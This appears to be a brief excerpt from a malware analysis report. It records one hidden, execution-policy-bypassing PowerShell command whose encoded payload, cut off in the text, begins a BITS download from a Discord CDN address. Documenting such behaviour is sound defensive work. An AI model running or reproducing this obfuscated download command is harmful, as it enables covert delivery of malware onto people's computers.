Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec byPass -Noninteractive -wiNDowStyle hidden -encoDEdCommAnd cwB0AEEAUgBUAC0AYgBJAHQAcwBUAHIAYQBOAFMAZgBlAHIAIAAtAFMAbwBVAFIAYwBlACAAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAA...' (with hidden window)